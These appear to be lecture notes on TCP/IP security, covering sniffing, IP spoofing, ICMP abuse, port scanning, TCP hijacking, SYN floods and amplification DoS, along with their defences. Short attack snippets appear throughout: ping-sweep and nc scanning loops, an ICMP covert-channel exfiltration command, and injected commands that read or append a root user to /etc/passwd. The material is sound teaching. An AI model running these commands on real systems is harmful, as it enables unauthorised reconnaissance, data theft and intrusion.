📖 1. Overview and Context

Why TCP/IP Security Matters

TCP/IP forms the foundation of the internet and virtually all modern computer networks. Understanding its security vulnerabilities is critical because:

• Ubiquity: TCP/IP is used everywhere, from home networks to enterprise systems to critical infrastructure
• Design Limitations: The protocols were designed in an era when security was not the primary concern
• Attack Surface: Each layer of the protocol stack presents unique vulnerabilities that attackers can exploit
• Real-World Impact: TCP/IP attacks have caused major disruptions, from DDoS attacks taking down major websites to connection hijacking compromising sensitive data

Prerequisites and Background

To fully understand this material, you should be familiar with:

• Basic networking concepts (protocols, packets, routing)
• The OSI model and TCP/IP layering architecture
• Fundamental security principles (CIA triad: Confidentiality, Integrity, Availability)
• Basic cryptographic concepts (hashing, encryption)

🌐 2. TCP/IP Protocols Fundamentals

2.1 The OSI Protocol Stack

The OSI (Open Systems Interconnection) model provides a conceptual framework for understanding network communications. The TCP/IP model maps to this architecture:

2.2 Internet Protocol (IP)

IP Characteristics

Key IP Functions

• Routing: Hosts know gateway location; gateways maintain routing tables to other networks
• Fragmentation and Reassembly: Splits packets when they exceed Maximum Transmission Unit (MTU)
• Error Reporting: Uses ICMP to notify source of dropped packets
• TTL (Time To Live): Decrements at each hop; prevents infinite routing loops

IPv4 Address Format

IPv4 addresses use the format A.B.C.D where each letter represents a byte (0-255).

2.3 Transmission Control Protocol (TCP)

TCP Purpose and Characteristics

TCP Three-Way Handshake

TCP establishes connections through a three-way handshake:

Client                              Server
   |                                     |
   |  1. SYN (seq=x)                    |
   |------------------------------------>|
   |                                     | (Listening)
   |  2. SYN-ACK (seq=y, ack=x+1)      |
   |<------------------------------------| | | (Store state) | 3. ACK (seq=x+1, ack=y+1) | |------------------------------------>|
   |                                     |
   |  Connection Established             |
   |                                     |

TCP Flags

TCP uses single-bit flags to control connection behavior:

• SYN (Synchronize): Initiates connection, contains initial sequence number
• ACK (Acknowledge): Acknowledges received data
• FIN (Finish): Gracefully closes connection
• RST (Reset): Abruptly terminates connection
• PSH (Push): Requests immediate delivery to application
• URG (Urgent): Marks urgent data

Ports

2.4 User Datagram Protocol (UDP)

UDP Characteristics

When to Use UDP

• Real-time applications: VoIP, video streaming, online gaming (latency matters more than reliability)
• DNS queries: Fast, small requests where retrying is acceptable
• NTP (Network Time Protocol): Time synchronization
• Broadcast/multicast: One-to-many communication
• Simple request-response: When application handles reliability

2.5 ICMP (Internet Control Message Protocol)

ICMP Purpose

ICMP provides “out-of-band” feedback about network operations:

• Error reporting when packets are dropped
• Network diagnostics (ping, traceroute)
• Congestion control signals
• Redirect notifications for better routing

Key ICMP Message Types

🛡️ 3. IP Layer Security

3.1 IP Packet Sniffing

What is Packet Sniffing?

Why Sniffing Works

• Shared medium: On traditional Ethernet hubs, all packets are broadcast to all connected devices
• Unencrypted protocols: Many applications send data in cleartext (old HTTP, FTP, Telnet)
• Passive attack: Sniffing doesn’t modify traffic, making it hard to detect
• Insider threat: Anyone on the same network segment can potentially sniff

# Put interface in promiscuous mode
sudo ifconfig eth0 promisc

# Start Wireshark and capture on eth0
# Filter for HTTP: http

# Look for POST requests containing form data
# You can see usernames, passwords, and data in cleartext!

Defenses Against Sniffing

• Encryption: Use TLS/SSL (HTTPS), SSH instead of Telnet, SFTP instead of FTP
• Network segmentation: Use VLANs to isolate traffic
• Switched networks: Switches only forward packets to destination port (but can be defeated with ARP spoofing)
• Detect promiscuous mode: Some tools can detect when NICs are in promiscuous mode

3.2 IP Spoofing

What is IP Spoofing?

Consequences of IP Spoofing

• Bypass IP-based authentication: Pretend to be a trusted host
• Hide attack source: Make tracing difficult
• Amplification attacks: Elicit responses directed at victim
• Anonymous attacks: Launch attacks without revealing identity

Limitations of IP Spoofing

3.3 IP Spoofing with Amplification

The Amplification Technique

The Smurf Attack

Defense Against Smurf

• Ingress filtering: Block inbound broadcasts from the internet
• Configure hosts: Don’t respond to pings on broadcast addresses
• Router configuration: Disable directed broadcasts at border routers
• Egress filtering: Prevent spoofed packets from leaving your network

3.4 IP Fragmentation

Why Fragmentation Exists

Fragmentation Fields

• Fragment ID: All fragments of same packet have same ID
• More Fragments (MF) bit: 1 = more fragments coming, 0 = last fragment
• Fragment Offset: Position of this fragment’s data in original packet
• Total Length: Size of this fragment

Fragmentation Problems

Ping of Death Attack

Defenses Against Fragmentation Attacks

• Drop invalid fragments: Reject overlapping, oversized, or malformed fragments
• Limit fragment storage: Set timeouts and buffer limits
• Prefer Path MTU Discovery: Avoid fragmentation when possible
• Deep packet inspection: Reassemble and inspect complete packets at firewall
• Update systems: Modern OS handle fragmentation better

3.5 Defending Against IP Spoofing

Ingress Filtering

Egress Filtering

📡 4. ICMP Attacks

4.1 ICMP Overview and Vulnerabilities

4.2 ICMP Echo (Ping) Attacks

ICMP Echo Mechanism

The ping utility uses ICMP Echo Request (Type 8) and Echo Reply (Type 0):

• Sender sends Echo Request with data payload
• Receiver responds with Echo Reply containing same data
• Simple reachability test

Security Issues with ICMP Echo

# Ping every address in the subnet
for i in {1..254}; do
    ping -c 1 -W 1 192.168.1.$i &
done

# Hosts that respond are active
# Collect list of active IPs for further attacks

Covert Channels in ICMP

# Encode stolen data in ping packets
# Many firewalls allow outbound ICMP
ping -p "48656c6c6f" victim.com

# "48656c6c6f" is hex for "Hello"
# Attacker on victim.com receives and decodes pings
# Data is exfiltrated despite firewall

4.3 ICMP Destination Unreachable

Purpose of Destination Unreachable

ICMP Type 3 messages indicate why a packet couldn’t be delivered:

• Code 0: Network unreachable
• Code 1: Host unreachable
• Code 2: Protocol unreachable
• Code 3: Port unreachable
• Code 4: Fragmentation needed but DF set
• Codes 5-15: Various other conditions

Attack: Forged Unreachable Messages

4.4 ICMP Redirect

Purpose of ICMP Redirect

Attack: Forged Redirects

4.5 ICMP Source Quench

Purpose

ICMP Source Quench (Type 4) was designed for congestion control:

• Router’s buffers fill up (congestion)
• Router sends Source Quench to sender
• Sender reduces transmission rate

Attack: Slow Down Victim

4.6 Inverse Mapping (Network Reconnaissance)

The Technique

# Inverse mapping scan
for i in {1..254}; do
    # Send to likely-invalid high port
    echo "test" | nc -u -w1 192.168.1.$i 65535
done

# Collect ICMP Unreachable messages
# IPs that don't generate Unreachable are active

4.7 Defenses Against ICMP Attacks

Firewall Rules

• Block inbound ICMP Echo Requests: Prevents ping sweeps and Smurf
• Rate-limit ICMP: Limit ICMP packets per second
• Block ICMP Redirects: Only accept from known gateways
• Disable Source Quench processing: Use ECN instead
• Validate ICMP payload: Unreachable messages should contain original packet header

The Trade-off

🔍 5. TCP Scanning and Spoofing

5.1 TCP Connection State

What Makes TCP Stateful

Why Sequence Numbers Matter

5.2 TCP SYN Scanning

How Port Scanning Works

SYN Scan Technique

Attacker                    Target
   |                            |
   | SYN → port 80             |
   |--------------------------->|
   |                            | (Port open)
   | <-- SYN-ACK               |
   |<---------------------------| | | | RST (don't complete) | |--------------------------->|
   |                            | (Connection never established)
   
   | SYN → port 23             |
   |--------------------------->|
   |                            | (Port closed)
   | <-- RST-ACK               |
   |<---------------------------|

Other Scanning Techniques

• ACK Scan: Sends ACK packets to map firewall rules (stateful vs stateless)
• FIN Scan: Sends FIN; open ports should ignore, closed ports send RST
• Xmas Tree Scan: Sets FIN, PSH, URG flags; exploits implementation quirks
• Null Scan: No flags set; closed ports respond with RST
• UDP Scan: Sends UDP packets; closed ports respond with ICMP Port Unreachable

# SYN scan of web server (requires root for raw sockets)
sudo nmap -sS -p 1-1000 target.example.com

# Output might show:
# PORT     STATE    SERVICE
# 22/tcp   open     ssh
# 80/tcp   open     http
# 443/tcp  open     https
# 8080/tcp closed   http-proxy

# Attacker now knows which services are running

Defending Against Port Scans

• Intrusion detection: IDS can detect scanning patterns (many SYN to different ports)
• Rate limiting: Limit connection attempts per source IP
• Firewall: Stealth mode (drop, don’t RST) makes scanning slower
• Port knocking: Ports appear closed until secret knock sequence
• Minimize services: Only run necessary services, close unused ports

5.3 TCP Connection Spoofing

The Challenge

Blind Spoofing Attack

# Observed connections to Server:
Connection 1: Initial SN = 1000
Connection 2: Initial SN = 1001
Connection 3: Initial SN = 1002

# Pattern: SN increments by 1 each connection
# Attacker predicts next SN will be 1003

# Spoof connection from Trusted:
[Attacker] SYN (src=Trusted)          → [Server]
[Server]   SYN-ACK (seq=1003, ack=X)  → [Trusted] (but Trusted is flooded, drops it)
[Attacker] ACK (seq=X+1, ack=1004)    → [Server] (guessed correctly!)
[Attacker] "rsh cat /etc/passwd"      → [Server] (authenticated as Trusted!)

Modern Defense: Random Sequence Numbers

On-Path vs Off-Path Attackers

• Off-path (blind) attacker: Cannot see traffic between victim and server
  • Must predict sequence numbers
  • Modern defenses make this extremely difficult
• On-path attacker: Can observe traffic (e.g., WiFi sniffing, compromised router)
  • Sees sequence numbers in real-time
  • Can inject or hijack with known SNs
  • Defense: Encryption (TLS/SSL, IPsec)

5.4 TCP Connection Hijacking

Hijacking Established Connections

Alice ←→ [Attacker observes] ←→ Server
         SSH connection (seq=5000, ack=8000)

Attacker (on-path, sees traffic):
1. Observes current sequence numbers
2. Waits for Alice to be idle
3. Injects: "echo 'attacker:x:0:0::/root:/bin/bash' >> /etc/passwd"
   with seq=5000 (Alice's current seq)
4. Server receives, thinks it's from Alice
5. Increments Alice's expected seq number
6. When Alice sends next packet, sequence number mismatch
7. Connection becomes desynchronized, usually breaks

Result: Attacker added root user, but connection breaks (noisy)

Defending Against Hijacking

• Encryption: TLS/SSL/SSH makes injected data meaningless (encrypted with wrong keys)
• Authentication: Cryptographic authentication of each packet (IPsec AH)
• Network security: Secure switches, encrypted WiFi (prevent on-path attackers)
• Large sequence number windows: Makes guessing harder, but improves performance

5.5 TCP Reset Attacks

The RST Flag

Attack: Connection Reset

💥 6. Denial of Service (DoS) Attacks

6.1 DoS Fundamentals

6.2 TCP SYN Flooding

The Vulnerability: Asymmetric Resource Allocation

SYN Flood Attack Mechanism

Defense: SYN Cookies

# Normal SYN flood scenario:
1000 SYN/sec × 30 sec timeout × 256 bytes = 7.6 MB state
Queue fills → legit users rejected

# With SYN cookies:
1000 SYN/sec × 0 bytes state = 0 MB state
Server just computes cookies and sends SYN-ACK
Only completed handshakes consume resources
Legit users can still connect!

Other SYN Flood Defenses

• Increase queue size: Simple but limited (eventually fills)
• Reduce timeout: Drop half-open connections faster (but might affect slow legitimate clients)
• Random deletion: When queue full, randomly drop existing half-open connections (gives legit traffic a chance)
• Proxy (e.g., Prolexic/Akamai): Only forward fully established connections to origin server
• Rate limiting: Limit SYN rate per source IP (but ineffective against DDoS with many sources)

6.3 Amplification Attacks

Amplification Principle

DNS Amplification

# Attacker's action:
Send DNS query: "Give me ALL records for example.com"
Source IP: victim's IP (spoofed)
Request size: ~60 bytes

# DNS server's response (to victim):
Response with all A, AAAA, MX, TXT, NS records
Response size: ~3000 bytes

Amplification factor: 3000/60 = 50x

NTP Amplification

# Attacker bandwidth: 10 Mbps
# Amplification factor: 206x
# Attack bandwidth to victim: 10 × 206 = 2,060 Mbps = 2.06 Gbps

# With 1000 attacker machines (botnet):
# 1000 × 2.06 Gbps = 2,060 Gbps = 2.06 Tbps
# This exceeds capacity of many ISPs!

Other Amplification Vectors

Defending Against Amplification

• Disable reflector services: Disable or restrict NTP monlist, DNS ANY queries, etc.
• Rate limiting: Limit response rate from reflectors
• BCP38 / Ingress filtering: ISPs should prevent spoofed source IPs
• Response Rate Limiting (RRL): DNS servers limit identical responses
• Blackhole routing: For extreme attacks, drop all traffic to victim IP (nuclear option)
• Anycast + Scrubbing Centers: Distribute and filter attack traffic

6.4 TCP Connection Floods

The Attack

Defenses

• Connection limits per IP: Limit simultaneous connections from single IP
• Rate limiting: Limit connection rate per IP
• Behavioral analysis: Detect bots (rapid connects, no real browsing)
• CAPTCHA challenges: Require human verification for suspicious IPs
• Blacklisting: Block known bot IPs (but bots can use many IPs)
• CDN / DDoS mitigation services: Cloudflare, Akamai, AWS Shield

6.5 Application-Layer DoS

Slowloris Attack

HTTP Flood

HTTP floods target expensive server operations:

• Database queries: Requests that trigger complex SQL queries
• Search: Searches that scan large datasets
• Login: Login attempts that hash passwords (CPU intensive)
• API calls: Expensive API operations

6.6 Connection Reset Attacks

DoS via RST

🛡️ 7. Countermeasures and Security Solutions

7.1 Defense in Depth Philosophy

7.2 Network Layer: IPsec

What IPsec Provides

IPsec Modes

• Transport Mode: Encrypts only payload, original IP header remains
  • Used for host-to-host communication
  • Smaller overhead
• Tunnel Mode: Encrypts entire IP packet, adds new IP header
  • Used for VPNs (gateway-to-gateway)
  • Hides internal network topology

IPsec Protocols

• AH (Authentication Header): Provides authentication and integrity, no encryption
• ESP (Encapsulating Security Payload): Provides confidentiality, authentication, and integrity
• IKE (Internet Key Exchange): Negotiates security associations and keys

7.3 Transport Layer: TLS/SSL

What TLS Provides

Why TLS is Successful

• Ubiquitous: HTTPS (HTTP over TLS) is standard for web
• Simple to use: Applications just use TLS sockets instead of plain TCP
• Transparent: Works through NAT and firewalls
• Well-studied: Vulnerabilities are quickly found and patched
• Certificate infrastructure: PKI provides scalable authentication

1. TCP handshake (SYN, SYN-ACK, ACK)
2. TLS handshake:
   a. ClientHello (supported ciphers, random)
   b. ServerHello (chosen cipher, random, certificate)
   c. Client verifies certificate, generates pre-master secret
   d. Client sends encrypted pre-master secret
   e. Both derive session keys from pre-master secret
   f. Finished messages (encrypted, authenticated)
3. Encrypted application data (HTTP GET, POST, etc.)

Result: All HTTP traffic is encrypted and authenticated

What TLS Doesn’t Protect

7.4 Transport Layer: SSH

SSH (Secure Shell)

SSH provides secure remote terminal access:

• Encrypted communication: All data encrypted
• Authentication: Password, public key, or Kerberos
• Integrity: Detects tampering
• Port forwarding: Tunnel other protocols through SSH

# Telnet (INSECURE - cleartext)
telnet server.com
# Password sent in cleartext, can be sniffed!

# SSH (SECURE - encrypted)
ssh user@server.com
# Password encrypted, session encrypted
# Also supports key-based authentication (no password needed)

7.5 Application Layer: Kerberos

Kerberos Overview

Kerberos Components

• KDC (Key Distribution Center): Trusted third party
• TGT (Ticket Granting Ticket): Obtained after initial authentication
• Service tickets: Obtained using TGT, grants access to specific services

What Kerberos Protects Against

• Eavesdropping: Tickets are encrypted
• Replay attacks: Timestamps prevent reuse
• IP spoofing at application layer: Authentication not based on IP

What Kerberos Doesn’t Protect

• Connection hijacking: After authentication, connection can still be hijacked
• DoS: Doesn’t prevent resource exhaustion
• KDC is single point of failure: If KDC compromised, entire system at risk

7.6 Practical Defense Recommendations

For Network Administrators

For Application Developers

• Use TLS by default: HTTPS for web, TLS for all network communication
• Validate all inputs: Prevent injection attacks
• Implement rate limiting: Limit API calls per user/IP
• Use SYN cookies: Enable in production web servers
• Connection limits: Limit concurrent connections per IP
• Fail gracefully: Degraded service better than complete failure
• Don’t trust IP addresses: Use cryptographic authentication

For Individual Users

• Use VPN: Encrypt traffic, especially on public WiFi
• Verify HTTPS: Check for padlock icon, valid certificates
• Use SSH, never Telnet: For remote access
• Enable firewall: On all devices
• Keep software updated: Enable automatic updates
• Use strong authentication: Multi-factor authentication

7.7 The Security vs. Functionality Trade-off

7.8 Future Directions

Ongoing Challenges

• IoT security: Billions of insecure devices
• IPv6 transition: New protocol, new vulnerabilities
• Quantum computers: Will break current cryptography
• AI-powered attacks: Adaptive, intelligent attacks
• Supply chain attacks: Compromise before deployment

Emerging Solutions

• QUIC: New transport protocol built on UDP with encryption by default
• DNSSEC: Authenticated DNS responses
• TLS 1.3: Improved security and performance
• BGPsec: Cryptographically secure BGP
• Zero Trust Architecture: Never trust, always verify
• Post-quantum cryptography: Quantum-resistant algorithms

📚 Summary and Conclusions

Core Concepts Covered

This lecture explored the security vulnerabilities inherent in the TCP/IP protocol stack, which forms the foundation of modern internet communications. We examined attacks at each layer and their countermeasures:

Practical Implications

The Ongoing Challenge

Connection to Broader Security

The vulnerabilities we’ve studied in TCP/IP illustrate fundamental security principles:

• Trust but verify: Authenticate, don’t assume
• Least privilege: Minimal access rights
• Defense in depth: Multiple security layers
• Fail secure: Default to safe state
• Keep it simple: Complexity breeds vulnerabilities
• Complete mediation: Check every access
• Economy of mechanism: Simple designs are more secure

Looking Forward

Network security continues to evolve. Modern developments include:

• TLS 1.3: Faster, more secure transport encryption
• QUIC: New encrypted transport protocol
• Zero Trust: “Never trust, always verify” architecture
• Secure BGP (BGPsec): Authenticated routing
• DNS over HTTPS: Encrypted DNS queries
• Post-quantum cryptography: Preparing for quantum computers

Additional Resources

• RFCs: Official protocol specifications
  • RFC 793 (TCP), RFC 791 (IP), RFC 792 (ICMP)
  • RFC 4987 (TCP SYN flooding attacks)
  • RFC 5961 (TCP security improvements)
• Books:
  • “TCP/IP Illustrated” by W. Richard Stevens
  • “Network Security: Private Communication in a Public World” by Kaufman et al.
• Online Resources:
  • OWASP (Open Web Application Security Project)
  • SANS Reading Room (security papers)
  • Krebs on Security (security news and analysis)